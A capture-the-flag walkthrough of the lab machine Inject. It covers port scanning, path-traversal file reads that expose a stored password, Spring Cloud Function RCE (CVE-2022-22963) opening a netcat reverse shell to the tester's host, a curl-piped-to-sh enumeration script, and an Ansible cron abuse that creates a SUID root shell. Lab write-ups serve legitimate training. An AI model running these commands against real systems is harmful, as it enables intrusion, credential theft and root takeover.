Hospital

Recon

nmap_scan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash 💨

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.228.213:22
Open 10.129.228.213:8080
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.228.213
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-24 19:58 UTC
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:58, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:58, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:58, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:58
Completed Parallel DNS resolution of 1 host. at 19:58, 0.11s elapsed
DNS resolution of 1 IPs took 0.11s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:58
Scanning 10.129.228.213 [2 ports]
Discovered open port 8080/tcp on 10.129.228.213
Discovered open port 22/tcp on 10.129.228.213
Completed Connect Scan at 19:58, 0.07s elapsed (2 total ports)
Initiating Service scan at 19:58
Scanning 2 services on 10.129.228.213
Completed Service scan at 19:58, 7.30s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.228.213.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:59, 2.51s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.33s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
Nmap scan report for 10.129.228.213
Host is up, received user-set (0.071s latency).
Scanned at 2024-11-24 19:58:52 UTC for 10s

PORT     STATE SERVICE     REASON  VERSION
22/tcp   open  ssh         syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ca:f1:0c:51:5a:59:62:77:f0:a8:0c:5c:7c:8d:da:f8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDKZNtFBY2xMX8oDH/EtIMngGHpVX5fyuJLp9ig7NIC9XooaPtK60FoxOLcRr4iccW/9L2GWpp6kT777UzcKtYoijOCtctNClc6tG1hvohEAyXeNunG7GN+Lftc8eb4C6DooZY7oSeO++PgK5oRi3/tg+FSFSi6UZCsjci1NRj/0ywqzl/ytMzq5YoGfzRzIN3HYdFF8RHoW8qs8vcPsEMsbdsy1aGRbslKA2l1qmejyU9cukyGkFjYZsyVj1hEPn9V/uVafdgzNOvopQlg/yozTzN+LZ2rJO7/CCK3cjchnnPZZfeck85k5sw1G5uVGq38qcusfIfCnZlsn2FZzP2BXo5VEoO2IIRudCgJWTzb8urJ6JAWc1h0r6cUlxGdOvSSQQO6Yz1MhN9omUD9r4A5ag4cbI09c1KOnjzIM8hAWlwUDOKlaohgPtSbnZoGuyyHV/oyZu+/1w4HJWJy6urA43u1PFTonOyMkzJZihWNnkHhqrjeVsHTywFPUmTODb8=
|   256 d5:1c:81:c9:7b:07:6b:1c:c1:b4:29:25:4b:52:21:9f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIUJSpBOORoHb6HHQkePUztvh85c2F5k5zMDp+hjFhD8VRC2uKJni1FLYkxVPc/yY3Km7Sg1GzTyoGUxvy+EIsg=
|   256 db:1d:8c:eb:94:72:b0:d3:ed:44:b9:6c:93:a7:f9:1d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICZzUvDL0INOklR7AH+iFw+uX+nkJtcw7V+1AsMO9P7p
8080/tcp open  nagios-nsca syn-ack Nagios NSCA
|_http-title: Home
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.80 seconds

HTTP (8080)

Writeup.png

2 users from /blog. admin and Brandon Auger, but none of the posts are readable.

Writeup-1.png

http://10.129.228.213:8080/upload accepts only images, upload one valid one. Get redirected to http://10.129.228.213:8080/show_image?img=kraken.png

LFI is possible

Writeup-2.png

The vulnerability oddly enough also supports directory listing so you can navigate the filesystem.

└─$ curl 'http://10.129.228.213:8080/show_image?img=../resources/application.properties'
server.tomcat.relaxed-query-chars=|,{,},[,]
server.error.whitelabel.enabled=false
spring.main.allow-circular-references=true
spring.servlet.multipart.max-file-size=1MB
spring.servlet.multipart.max-request-size=2MB
spring.cloud.config.uri=
spring.cloud.config.allow-override=true
debug=false
server.error.include-message=always

We can also enumerate users and this WebApp seems to be running as frank because we have read permissions.

└─$ curl http://10.129.228.213:8080/show_image?img=../../../../../../../home/frank/.m2/settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>

Password doesn't work on SSH.

└─$ curl http://10.129.228.213:8080/show_image?img=../../../../../../../var/www/WebApp/pom.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
        <modelVersion>4.0.0</modelVersion>
        <parent>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-starter-parent</artifactId>
                <version>2.6.5</version>
                <relativePath/> <!-- lookup parent from repository -->
        </parent>
        <groupId>com.example</groupId>
        <artifactId>WebApp</artifactId>
        <version>0.0.1-SNAPSHOT</version>
        <name>WebApp</name>
        <description>Demo project for Spring Boot</description>
        <properties>
                <java.version>11</java.version>
        </properties>
        <dependencies>
                <dependency>
                        <groupId>com.sun.activation</groupId>
                        <artifactId>javax.activation</artifactId>
                        <version>1.2.0</version>
                </dependency>

                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-starter-thymeleaf</artifactId>
                </dependency>
                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-starter-web</artifactId>
                </dependency>

                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-devtools</artifactId>
                        <scope>runtime</scope>
                        <optional>true</optional>
                </dependency>

                <dependency>
                        <groupId>org.springframework.cloud</groupId>
                        <artifactId>spring-cloud-function-web</artifactId>
                        <version>3.2.2</version>
                </dependency>
                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-starter-test</artifactId>
                        <scope>test</scope>
                </dependency>
                <dependency>
                        <groupId>org.webjars</groupId>
                        <artifactId>bootstrap</artifactId>
                        <version>5.1.3</version>
                </dependency>
                <dependency>
                        <groupId>org.webjars</groupId>
                        <artifactId>webjars-locator-core</artifactId>
                </dependency>

        </dependencies>
        <build>
                <plugins>
                        <plugin>
                                <groupId>org.springframework.boot</groupId>
                                <artifactId>spring-boot-maven-plugin</artifactId>
                                <version>${parent.version}</version>
                        </plugin>
                </plugins>
                <finalName>spring-webapp</finalName>
        </build>
</project>

CVE-2022-22965: Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5 -- Doesn't work.

CVE-2022-22963-PoC -- works

└─$ curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("busybox nc 10.10.14.42 4444 -e /bin/bash")' -d '' http://10.129.228.213:8080/functionRouter -s | jq .
Writeup-3.png
script /dev/null -qc /bin/bash
frank@inject:~$ id
uid=1000(frank) gid=1000(frank) groups=1000(frank)
frank@inject:~$ su - phil
su - phil
Password: DocPhillovestoInject123

phil@inject:~$ id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)

Password authentication didn't work on SSH, but it works locally, meaning SSH has password disabled.

SSH

Upgrade to SSH

└─$ ssh-keygen -f id_rsa -P x -q
└─$ cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMciiJD30Ulyy6yEipvjULwb/jORUPUJYA1PYqtNqT5x woyag@kraken
---
phil@inject:~/.ssh$ mkdir ~/.ssh; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMciiJD30Ulyy6yEipvjULwb/jORUPUJYA1PYqtNqT5x woyag@kraken' > ~/.ssh/authorized_keys

Still doesn't work, check SSH configuration:

phil@inject:~/.ssh$ grep -E '^DenyUsers|^DenyGroups' /etc/ssh/sshd_config
DenyUsers phil

Only phil user is denied access... We can SSH as frank and then elevate then.

User.txt

phil@inject:~$ cat user.txt
663a15ed16a9c6f45bcb6aa7c78fa3dc

Privilege Escalation

phil@inject:~$ curl 10.10.14.42/lp.sh|sh|tee /tmp/lp.log
				╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
                ╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
...
root         916  0.0  0.0   6816  2928 ?        Ss   19:56   0:00 /usr/sbin/cron -f
root        8850  0.1  0.0   8356  3332 ?        S    21:06   0:00  _ /usr/sbin/CRON -f
root        8853  0.0  0.0   2608   596 ?        Ss   21:06   0:00      _ /bin/sh -c sleep 10 && /usr/bin/rm -rf /opt/automation/tasks/* && /usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
root        8856  0.0  0.0   5476   516 ?        S    21:06   0:00          _ sleep 10
...
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/tmp/hsperfdata_frank/782
/tmp/lp.log
/opt/automation/tasks/playbook_1.yml
/var/log/syslog
...

phil@inject:/opt/automation/tasks$ cat /opt/automation/tasks/playbook_1.yml
- hosts: localhost
  tasks:
  - name: Checking webapp service
    ansible.builtin.systemd:
      name: webapp
      enabled: yes
      state: started

There's some ansible cronjob which probably runs these playbooks and then removes them.

https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ansible-playbook-privilege-escalation/

phil@inject:/opt/automation/tasks$ nano letmein.yml
phil@inject:/opt/automation/tasks$ cat letmein.yml
- hosts: localhost
  tasks:
    - name: RShell
      command: install -m4777 /bin/bash /tmp/rootbash

After ~10 seconds

phil@inject:/opt/automation/tasks$ /tmp/rootbash -p
rootbash-5.0# id
uid=1001(phil) gid=1001(phil) euid=0(root) groups=1001(phil),50(staff)

Root.txt

rootbash-5.0# cd /root
rootbash-5.0# cat root.txt
67f5ef862b1bfe0af73e7dbc60475e72
PreviousHospitalNextIntentions

Last updated